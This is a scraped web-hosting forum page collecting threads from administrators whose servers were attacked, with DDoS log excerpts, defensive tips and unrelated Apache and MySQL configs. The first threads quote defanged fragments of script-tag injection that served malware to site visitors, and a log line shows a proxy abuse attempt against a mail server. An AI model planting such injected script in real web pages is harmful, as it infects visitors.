Web Server Has Been Attacked

Jul 1, 2009

Server info:
Windows 2003 box
Dedicated server currently hosted at the planet.

Problem:

It would appear there has been a security breach into the server recently. This morning we cleared off a Trojan, and also a new user that had been created on the server.

All of our websites we host (around 200) had been affected. Almost every file had new javascript or links to an .swf, they load in iframes and are very malicious, actually giving any vistor to the site a virus.

I tracked down the embed code that I found in most files appended to the end of each file.

Below shows up in most .asp, .cfm, .html files (no spaces, just can't paste a url in here yet)...

<scRipT s rc=[url]
<scRipT sr c=[url]
Below shows up any any .js file (no spaces, just can't paste a url in here yet)...

document.writeln ("<script sr c=[url]
document.writeln ("<script sr c=[url]

So I got a script that opens up every file looking for this code and stripping it out.

Seemed to work at first, but now all the sites have been rewritten again..... and again.

So obviously something is overwriting this.

View 7 Replies


ADVERTISEMENT

Server Is Being Attacked

Jul 1, 2009

Server info:

Windows 2003 box

Dedicated server currently hosted at the planet.

Problem:

It would appear there has been a security breach into the server recently. This morning we cleared off a Trojan, and also a new user that had been created on the server.

All of our websites we host (around 200) had been affected. Almost every file had new javascript or links to an .swf, they load in iframes and are very malicious, actually giving any vistor to the site a virus.

I tracked down the embed code that I found in most files appended to the end of each file.

Below shows up in most .asp, .cfm, .html files (no spaces, just can't paste a url in here yet)...

<scRipT s rc=[url]
<scRipT sr c=[url]

Below shows up any any .js file (no spaces, just can't paste a url in here yet)...

document.writeln ("<script sr c="[url]
document.writeln ("<script sr c="[url]

So I got a script that opens up every file looking for this code and stripping it out. Seemed to work at first, but now all the sites have been rewritten again..... and again. So obviously something is overwriting this.

View 9 Replies View Related

Server Is Being Attacked

Jun 20, 2007

222.216.28.147 - - [20/Jun/2007:06:05:04 -0500] "GET [url]
(compatible; MSIE 6.0; Windows NT 5.0)"
172.131.255.237 - - [20/Jun/2007:04:41:06 -0500] "POST [url]
172.131.255.237 - - [20/Jun/2007:04:41:07 -0500] "CONNECT mx1.mail.yahoo.com:25 HTTP/1.0" 405 303 "-" "-"

View 1 Replies View Related

Is My Server Being Attacked

Dec 25, 2008

Is my server being attacked? Please help.

Is my server being attacked? Please help.
I'm using Linux RedHat el5. Recently, my server down almost at the same time everyday.
I try looking in /var/log/messages, it is flooded by this kind of message:


Dec 25 22:41:16 ls1 xinetd[3958]: START: smtp pid=430 from=173.66.124.249
Dec 25 22:41:16 ls1 xinetd[3958]: START: smtp pid=437 from=92.84.45.130
Dec 25 22:41:16 ls1 xinetd[3958]: START: smtp pid=439 from=173.66.124.249
Dec 25 22:41:16 ls1 xinetd[3958]: START: smtp pid=440 from=173.66.124.249
Dec 25 22:41:24 ls1 kernel: ip_conntrack: table full, dropping packet.

From the log, at "from=xx.xx.xxx.xxx" are not all the same, but the same ip appeared for a while, then change to another.

I'm newbie to Linux, and donot quite understand what the this message is mean. Is this can be a cause that make my server down? Please suggest.

View 7 Replies View Related

Server Being Attacked Via Http

Jun 1, 2007

my friend's server is being attacked, the http processes shoots up causing the server load to go above 200 in minutes of starting httpd which causes server to die.

this is how the apache web server's access_log would log a normal http request;
------------------------------------------------------
"xx.xxx.xx.xx - - [01/Jun/2007:22:13:21] "GET /folder/name.gif HTTP/1.1" 200 877 [url]"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
------------------------------------------------------

Today when the http load increased we saw hundreds of following requests;
------------------------------------------------------
"xx.xxx.xx.xx - - [01/Jun/2007:22:13:21] "GET /? HTTP/1.1" 200 16305 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
------------------------------------------------------

You see the difference between a legitimate http access log entry and the above one is that the legitimate one shows the filename(GET /folder/name.gif) and domain name being requested whereas the second one shows ("GET /?")

Above requests continously originate from 30 to 40 different ip addresses. Most of them russian ips, and many form US and canada to.

When i do a grep "GET /?" in access log there are thousands of these which started just today.

I cannot block each ips because i feel they have hundreds of IPs to initiate these requests from.

View 14 Replies View Related

Server Is Being DDOS Attacked

Oct 22, 2007

I see what IPs are attacking them? OS: CentOS

View 9 Replies View Related

My Limestone Server - Virus Attacked Or What?

Jul 23, 2009

Alright guys - my server the past two weeks is just freaking ridiculous. It's a Core2Quad Q9300 2.5ghz server with 8gb of ram. It should be fast as hell. I can't move 20 e-mails in my mail client without the server grinding to a complete halt and httpd and mysql going unresponsive. Right now I'm just trying to copy a damned screen shot of the task manager performance tab and it's taking about 3 minutes to paste it - even though the CPU utilization is averaging only 20% at the moment and memory is only 2.5gb.


I restarted WAMP and now it seems to be running smoother. My Outpost firewall, though, didn't show too many connections to the server that it was maxing out.

Here's my ping responses just now while I was typing this - I was watching the firewall connections and I was only having like 60 connections to httpd, 20 connections to mysql, 5-10 to my SmarterTools mail server, and then my remote desktop connection. My network utilization got up to a whole 5% - so it's not that I have too many connections or something. Here's the ping responses:

C:Documents and SettingsBrian>ping mifbody.com -n 99

Pinging mifbody.com [216.245.195.146] with 32 bytes of data:

Reply from 216.245.195.146: bytes=32 time=70ms TTL=115
Reply from 216.245.195.146: bytes=32 time=73ms TTL=115
Reply from 216.245.195.146: bytes=32 time=81ms TTL=115
Reply from 216.245.195.146: bytes=32 time=78ms TTL=115
Reply from 216.245.195.146: bytes=32 time=71ms TTL=115 ....

View 7 Replies View Related

Being Attacked What Can I Do

May 28, 2008

From running smoothly to suddenly going to 900 write requests, my web server crashes.

I don't want to be asking the DC to restart my machine every minute.

They installed Squid which solved the load and seems to run smooth. But my script doesn't function properly as everything is cached.

I then put all my images/css etc on a lighttpd server which can handle all the requests without problems.

So now apache is only handling around 30 php requests per second. But will magically jump up to 600+.

The DC says I'm being syn flooded.

I have APF, deflate DDoS, etc. installed.

Anything else I can do?

View 6 Replies View Related

Being Attacked - DDOS?

Nov 6, 2007

OK well today I found out my server was being DDOS'ed

And I know which domain is being attacked with hundreds of IP's. I am running Cpanel / WHM but I have no idea how I can stop this?

Any ideas or suggestions? Maybe redirect the DNS? to a invalid ip? But I'm not sure how i can go about doing that?

View 9 Replies View Related

If 1 Website Were To Get Attacked

Jun 29, 2009

if i were to have 1 website get have a DDoS attack to it, would it knock out my server for a while, and can i recover the server by restarting it?

View 14 Replies View Related

Getting DDos Attacked

May 28, 2008

All my websites are down because a Dos attack on port 80. Rackspace basically said they can't do anything to help me unless I want them to install a $1500 a month hardware add on. They tried banning a couple ip addresses and that did not work. They recommended prolexic.com but does anyone have any other advice?

View 14 Replies View Related

Attacked By Russia

Jun 11, 2008

I have been consistently attacked by Russia.

When I had apache my server would die and you couldn't even SSH. Now I have Litespeed my site loads but SUPER SUPER slow.

Last night I was SYN Flooded with 125mbps. Though they consumed nearly all my bandwidth and I owe the DC tons of cash in bandwidth now. I managed to block Russia and the load halved to about 50 and the site was still functional but intermittent.

I have been running Deflate DDoS etc to block IPs.

I'm wondering if I get a load balancer with another box, would this fix my problems?

I heard you can modify the settings somewhere to identify syn attacks and auto block them.

View 3 Replies View Related

Site Getting Attacked At Will

Oct 11, 2007

My site is getting attacked since last couple of days and the attacker brings it down in 5-10 minutes.I have to restart the apache webserver to bring it back again until he strike again.

I am trying to secure it as much as possible using .htaccess,i am able to stop almost all the perl/php scripts etc but the last time the hacker attacked the site today,i see 100s of these entries in my logs:

Code:
71.181.220.147 - - [10/Oct/2007:21:44:44 -0700] "GET /templates/template/images/content.png HTTP/1.1" 200 510 [url] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Embedded Web Browser from: [url] .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; IEMB3; .NET CLR 2.0.50727; IEMB3)"

I would like to know what is this "Embedded Web Browser from: [url] and how can i block the hacker from running this using .htaccess?

View 10 Replies View Related

I'm Being DOS Attacked By A Gameserver Company!

Dec 20, 2008

My internet connection started cutting out and I found it strange, I presumed it was with my ISP and so I ignored it as they're pretty crap, then it carried on today so I did some investigation (Turned on error logging for my router) so I go ahead and wait, an hour later my internet connection cuts out, to the logs!

Sat, 2008-12-20 22:01:38 - UDP Packet - Source:89.238.152.200,28960 Destination:192.168.1.103,28960 - [Firewall Log-DOS] ....

Am I correct in thinking there are multiple IP addresses "Attacking" my home network? If so, that's mighty strange and should I be worried?

I checked some of the IPs, most go to dedicateds around the world. One is a gameserver admin panel. Have these been hijacked and being used to "Attack" me?

I have a theory, be it probably wrong; The port number 28960 is used by Call of Duty 1 as the "default" port for a gameserver, and I play a lot of CoD1. Therefore, presumably, that port is open by our router, 28960, so somehow they've found this to be open and are "attacking" it. I'm not sure, but it seems possible, not sure why though.

192.168.1.103 is presumably ME on our subnet? Router is linksys

View 10 Replies View Related

Identify What Domain Is Being Attacked

Mar 20, 2008

Is there a way to determine from monitoring the packets coming in to my IP address what domain on my server is being attacked? Something like Tcpdump maybe can tell me? Having DDoS trouble and I'm trying to identify the domain being hit.

View 2 Replies View Related

Site Being Attacked Hard

Jul 27, 2008

I'm Tech admin at Fagex.net

This site has always been prone for attacks on it's servers. At the moment theres been a new owner and so things are not settled back down yet, How ever people are still atacking the site.

The hosting as far as i am aware has no software/hardware firewall i have tould the onwer but has not taken my advice.

This morning i woke up to find it was being attacked, so i went stright to SSH and started blocking them etc.

I was looking around for free Anti DOs tools and came across,

[url]

Seems good, I've only just installed so still need to see the effects.

I also added a block in to htacess which has

Quote:

<ifmodule mod_limitipconn.c>
<cocation />
Maxconnperip 3
NoIPlimit image/*
</location>
</ifmodule>

The server is a dedicated VPS, and the owner has two sites on which both are forums.

What can i do to protect the sites? What can i do to prevent them? What can i do to stop them.

View 12 Replies View Related

Port Scan Attacked On Users

Apr 14, 2007

[url]

[url]

One of my users posted this in the forum saying my server is scanning his computer. His this serious? Do I have virus? Should i be worried? Well i am kinda worried. I tried googling it, but i can't seem to figure the right keywords for a good result.

View 4 Replies View Related

Hacked - DDos Attacked, Downtime 1 Week...

Aug 23, 2008

The attack is large enough now that the rules I've put in place aren't really helping much. Mod_evasive and mod_security are also installed, however this doesn't appear to be helping much either. The invalid user-agents hitting the site are filling up the max connections and then apache stops responding. I also tried raising the MaxClients in httpd.conf, however the vps then started hitting its memory limit.

I was on a shared plan and they moved me to a VPS same problem
Host: urljet.com

I have had one host representative thats said "I think we could take care of you but you would have to use this plan with the firewalls"

www . liquidweb.com/cart/content/dedicated/Webmaster/Plan1

View 14 Replies View Related

Improve Performance- Web Server, SSH Server, And Mail Server

May 8, 2007

I've got a VPS which is serving as the main server for a number of sites. Web Server, SSH Server, and Mail Server.

What I've got running:

Apache2, PHP5, MySQL5, Dovecot, Postfix

One of the sites is a growing forum with a MASSIVE photo album. This is the site where I notice the most slowness.

Changing the server software is not an option - Only optimization.

Quote:

Originally Posted by httpd.conf

ServerTokens OS
ServerRoot "/etc/httpd"
PidFile run/httpd.pid
Timeout 300
KeepAlive Off
MaxKeepAliveRequests 100
KeepAliveTimeout 5
<IfModule prefork.c>
StartServers 8
MinSpareServers 8
MaxSpareServers 13
ServerLimit 256
MaxClients 256
MaxRequestsPerChild 50
</IfModule>
<IfModule worker.c>
StartServers 2
MaxClients 150
MinSpareThreads 25
MaxSpareThreads 75
ThreadsPerChild 25
MaxRequestsPerChild 0
</IfModule>
Listen 80
LoadModule auth_basic_module modules/mod_auth_basic.so
LoadModule auth_digest_module modules/mod_auth_digest.so
LoadModule authn_file_module modules/mod_authn_file.so
LoadModule authn_alias_module modules/mod_authn_alias.so
LoadModule authn_anon_module modules/mod_authn_anon.so
LoadModule authn_dbm_module modules/mod_authn_dbm.so
LoadModule authn_default_module modules/mod_authn_default.so
LoadModule authz_host_module modules/mod_authz_host.so
LoadModule authz_user_module modules/mod_authz_user.so
LoadModule authz_owner_module modules/mod_authz_owner.so
LoadModule authz_groupfile_module modules/mod_authz_groupfile.so
LoadModule authz_dbm_module modules/mod_authz_dbm.so
LoadModule authz_default_module modules/mod_authz_default.so
LoadModule ldap_module modules/mod_ldap.so
LoadModule authnz_ldap_module modules/mod_authnz_ldap.so
LoadModule include_module modules/mod_include.so
LoadModule log_config_module modules/mod_log_config.so
LoadModule logio_module modules/mod_logio.so
LoadModule env_module modules/mod_env.so
LoadModule ext_filter_module modules/mod_ext_filter.so
LoadModule mime_magic_module modules/mod_mime_magic.so
LoadModule expires_module modules/mod_expires.so
LoadModule deflate_module modules/mod_deflate.so
LoadModule headers_module modules/mod_headers.so
LoadModule usertrack_module modules/mod_usertrack.so
LoadModule setenvif_module modules/mod_setenvif.so
LoadModule mime_module modules/mod_mime.so
LoadModule dav_module modules/mod_dav.so
LoadModule status_module modules/mod_status.so
LoadModule autoindex_module modules/mod_autoindex.so
LoadModule info_module modules/mod_info.so
LoadModule dav_fs_module modules/mod_dav_fs.so
LoadModule vhost_alias_module modules/mod_vhost_alias.so
LoadModule negotiation_module modules/mod_negotiation.so
LoadModule dir_module modules/mod_dir.so
LoadModule actions_module modules/mod_actions.so
LoadModule speling_module modules/mod_speling.so
LoadModule userdir_module modules/mod_userdir.so
LoadModule alias_module modules/mod_alias.so
LoadModule rewrite_module modules/mod_rewrite.so
LoadModule proxy_module modules/mod_proxy.so
LoadModule proxy_balancer_module modules/mod_proxy_balancer.so
LoadModule proxy_ftp_module modules/mod_proxy_ftp.so
LoadModule proxy_http_module modules/mod_proxy_http.so
LoadModule proxy_connect_module modules/mod_proxy_connect.so
LoadModule cache_module modules/mod_cache.so
LoadModule suexec_module modules/mod_suexec.so
LoadModule disk_cache_module modules/mod_disk_cache.so
LoadModule file_cache_module modules/mod_file_cache.so
LoadModule mem_cache_module modules/mod_mem_cache.so
LoadModule cgi_module modules/mod_cgi.so
Include conf.d/*.conf
User apache
Group apache

Quote:

Originally Posted by my.cnf

[mysqld]
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock
# Default to using old password format for compatibility with mysql 3.x
# clients (those using the mysqlclient10 compatibility package).
old_passwords=1

[mysql.server]
user=mysql
basedir=/var/lib

[mysqld_safe]
log-error=/var/log/mysqld.log
pid-file=/var/run/mysqld/mysqld.pid

View 8 Replies View Related

Remote Upload To Server (url/server To Server)

Mar 7, 2009

I looked a lot - can not find solution ....

I want to transfer a file from [url]to [url]or [url]Without it will pass my localcomputer (slow upload)

It can be also a script i will install like this one - this is only for images
[url](remote)

View 7 Replies View Related

Plesk 11.x / Windows :: Don't Have Root Access To Server As It Is A Webfusion Dedicated Server

Oct 16, 2013

I have Plesk 11.5 (service provider mode) on a Windows 2008 server IIS7.Most of my sites are developed in .asp and therefore i use a custom 500-100.asp error page that check s the IP of the visitor then displays either a friendly error, or if its my IP a full error of what has happened (it also emails me the error). This allows me to debug pages easily whilst developing and to keep an eye on anyone trying SQL Injection hacks on my sites (as the error and email also have session variables and IP address).I dont have root access to the server as it is a Webfusion dedicated server.I have following the Plesk documentation -

1) Switch on custom errors for the subscription
2) Look in virtual directories and navigate to error documents
3) Find the error in question (500:100) and change it to point at either a file or URL

FILE - I had the data centre add in the 500-100.asp error page in to the virtual template so that my page is available in the list of virtual files - this didn't work but that maybe because its not a static page??

URL - when i add the path it says its incorrect, if i add a fully qualified address, it accepts it but it doesn't work.give me a specific example of the URL that can be entered relative to the root as the format in the documentation isn't accepted. The last step is to restart IIS which is also an issue as i cant seem to do this from the Plesk panel..It is as if it isn't catching the 500:100 error, and only catching the general 500 error??

View 1 Replies View Related

Urchin 5 / Google A . Transfering From Server To Server (Serial Already Activated)

Nov 21, 2006

I am currently running Google Analytics/Urchin 5 (v5.7.02), on a server, the server has started to act up, (on its last legs etc) and now I am trying to transfer the Urchin Software to a new server, where it would work effectively.

However upon installing the urchin software on the new server and running it (localhost:9999), I am presented with An Action Items Page, and these following choices

Obtain Demo License
Buy License
Activate Pre-Purchased License

I choose ‘Activate Pre-Purchased License’ pop in the Serial number and complete the registration then…

---------------------------------------------------------
Urchin Licensing Center -- Error!

An error has occured during your transaction, please use the back button and correct the problem. The specific error message is:

• Unable to generate a license. Some possible reasons:

Your serial code is currently active <<< How do I disable it and use it on another server?
---------------------------------------------------------

So all I want to do is deactivate the serial and reactivate it on another server.

Does anyone have experience with this or a similar problem or have a solution to this problem. Any help be most appriciated.

Or even a Contact Number so that i can get some one over the phone!

View 2 Replies View Related

Cpanel Domain Name Server (DNS) Setting For Email On 2 Seperate Server

Nov 7, 2009

This is the scenario, domain.com are setup on server1, however server2 also has the same profile of domain.com as we use ns3 and ns4 using domain.com. This works fine with the nameserver setup on server2.

However I encounter problems as the emails from server2 won't reach server1 as there are duplicate profile on server2.

My question is how do I setup the DNS in cpanel/whm from server2 so the emails from server2 will reach server1?

Server1 (www.domain.com)
ns1.domain.com
ns2.domain.com

Server2
ns3.domain.com
ns4.domain.com

View 6 Replies View Related

File Server Setup With Nginx...how Do I Choose The Config For The Server

Apr 22, 2009

I just want to use a server for file sharing, it will have nginx and that's it. I'm looking at centos, or freebsd, but I been using centos forever now and I'm not sure how to use freebsd, should I just stay with centos?

Do I tell my hosting provider to just install the OS and give me ssh action and that's it? Don't install any control panels or any other stuff? I want one domain and one subdomain on it though and ftp action.

View 8 Replies View Related

Remote Spamassian With Multiple Mail Server (Smartermail Server)

May 12, 2009

Remote Spamassassin for Multiple Smartermail Server

I want to setup Remote Spamassassin(On Linux) for Multiple Smartermail servers. I want to the setup the spamassassin on a linux box

How i can setup this with multiple smartermail servers.

View 6 Replies View Related

How To Tansfer Backup Files From Linux Server To Windows Server

Jul 4, 2007

what is the fast and best way?

View 4 Replies View Related

Plesk 12.x / Linux :: Full Server Migration To New Server With Same Hostname?

Jul 20, 2015

I'm wondering whether it is possible to perform a full server migration to a new Plesk server with the same hostname or will Plesk give an error about the hostname being the same?

The new server would not be accessible by hostname (only via IP) until DNS and glue records were changed after the migration.

View 1 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved